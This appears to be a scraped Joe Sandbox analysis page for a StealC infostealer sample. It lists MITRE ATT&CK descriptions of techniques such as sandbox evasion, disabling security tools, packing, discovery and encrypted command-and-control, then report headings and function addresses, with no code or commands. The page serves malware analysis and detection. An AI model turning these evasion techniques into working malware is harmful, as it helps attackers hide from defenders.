Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00609BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 005F4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 005F62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 00607690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 00609F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 005F48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00605760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 006019F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Function 00606C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Function 005F1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00606D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Function 005F4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Function 00605440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON